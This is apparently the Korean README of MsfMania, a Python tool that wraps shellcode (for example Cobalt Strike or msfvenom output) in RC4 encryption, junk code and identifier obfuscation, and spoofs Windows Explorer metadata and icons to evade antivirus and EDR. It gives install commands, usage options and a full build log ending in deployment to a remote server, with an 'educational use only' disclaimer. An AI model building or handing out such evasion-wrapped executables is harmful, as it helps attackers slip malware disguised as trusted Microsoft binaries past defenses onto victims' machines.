
Python AV 우회 도구
MsfMania는 Windows 시스템에서 EDR/AV 탐지를 우회하기 위해 설계된 고급 Python 기반 페이로드 난독화 프레임워크입니다. 동적 코드 생성, 다중 계층 암호화(RC4) 및 바이너리 메타데이터 스푸핑을 통해 높은 다형성의 실행 파일을 생성합니다.
⚠️ 교육 목적으로만 사용 - 이 도구는 공인된 보안 테스트 및 연구 목적으로만 설계되었습니다.
git clone https://github.com/lepotekil/MsfMania.gitcd MsfManiadocker build -t msfmania:latest .# docker run --rm -v "$(pwd):/app/output" msfmania:latest
███╗ ███╗███████╗███████╗███╗ ███╗ █████╗ ███╗ ██╗██╗ █████╗
████╗ ████║██╔════╝██╔════╝████╗ ████║██╔══██╗████╗ ██║██║██╔══██╗
██╔████╔██║███████╗█████╗ ██╔████╔██║███████║██╔██╗ ██║██║███████║
██║╚██╔╝██║╚════██║██╔══╝ ██║╚██╔╝██║██╔══██║██║╚██╗██║██║██╔══██║
██║ ╚═╝ ██║███████║██║ ██║ ╚═╝ ██║██║ ██║██║ ╚████║██║██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝
Version : 3.0.1 - Author : Killian CASAROTTO - Updated : 10/14/2025
사용법: main.py [-h] -p 페이로드 -o 출력 [-k {1,2,3}] [-s]
[--spoof-bin 대상_EXE] [-j 정크코드]
옵션:
-h, --help 도움말 메시지를 표시하고 종료
-p, --payload 페이로드
사용할 페이로드 파일 선택 (예: cobalt64.bin)
-o, --output 출력 출력 경로 (파일명 포함) (예:
/path/to/output/payload)
-k, --keysize {1,2,3}
RC4 키 크기(바이트 단위, 1-3)
-s, --strip 실행 파일 스트리핑
--spoof-bin 대상_EXE
대상 실행 파일에서 바이너리 메타데이터 스푸핑 (예:
assets/bins/bitsadmin_11-21H2_KB5032192.exe)
-j, --junkcodes 정크코드
삽입할 정크 코드 수 (기본값: 0)
# docker run --rm -v "$(pwd):/app/output" msfmania:latest python3 main.py -p msfmania/assets/bins/win_x64_msgbox_msfvenom_20251010.bin -o output/payload_test_$(date +%s) --keysize 3 --spoof-bin assets/bins/explorer_11-24H2_KB5065789.exe --junkcodes 1000
███╗ ███╗███████╗███████╗███╗ ███╗ █████╗ ███╗ ██╗██╗ █████╗
████╗ ████║██╔════╝██╔════╝████╗ ████║██╔══██╗████╗ ██║██║██╔══██╗
██╔████╔██║███████╗█████╗ ██╔████╔██║███████║██╔██╗ ██║██║███████║
██║╚██╔╝██║╚════██║██╔══╝ ██║╚██╔╝██║██╔══██║██║╚██╗██║██║██╔══██║
██║ ╚═╝ ██║███████║██║ ██║ ╚═╝ ██║██║ ██║██║ ╚████║██║██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝
Version : 3.0.1 - Author : Killian CASAROTTO - Updated : 10/14/2025
[~] 셸코드 암호화 시작 (키 크기: 3)
[~] 셸코드 압축 중 (303바이트)
[+] 셸코드가 284바이트로 압축됨
[~] 수정된 RC4로 암호화 중
[+] 암호화 완료: 284바이트 (b64: 380바이트)
[~] 1000개의 정크 코드 주입 중...
[~] main()에서 27개의 주입 지점 발견
[~] 추가 주입 지점 973개 생성
[+] 1000/1000 함수 호출 삽입됨
[+] 1000개의 정크 코드가 성공적으로 주입됨
[+] 1000개의 정크 코드가 성공적으로 주입됨
[~] 난독화 적용 중...
[+] 145개의 식별자가 난독화됨
[~] assets/bins/explorer_11-24H2_KB5065789.exe에서 메타데이터 추출 중
[+] 추출된 메타데이터:
설명: Windows Explorer
버전: 10.0.26100.6725 (WinBuild.160101.0800)
회사: Microsoft Corporation
제품: Microsoft® Windows® Operating System
[~] 23개의 아이콘 그룹(181개 아이콘) 발견
[+] 총 181개 중 26개의 고유 아이콘 추출됨
[+] 26개의 아이콘이 추출됨
[~] /app/output/output/payload_test_1760467840.exe로 컴파일 중
[~] 리소스 파일 컴파일 중: /tmp/payload_test_1760467840.rc
[+] 리소스 파일 컴파일됨: /tmp/payload_test_1760467840.res
[+] 컴파일 성공: /app/output/output/payload_test_1760467840.exe
[+] 바이너리 크기: 405ko
[+] C 소스가 /app/output/examples/main.c에 복사됨
[*] 원격 서버에 배포 중...
[+] 페이로드가 성공적으로 배포됨
⚠️ 중요: 이 프로젝트는 교육 및 공인된 보안 테스트 목적으로만 사용됩니다.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.
MsfMania |
페이로드 실행 로그 |
VirusTotal 탐지 결과 | |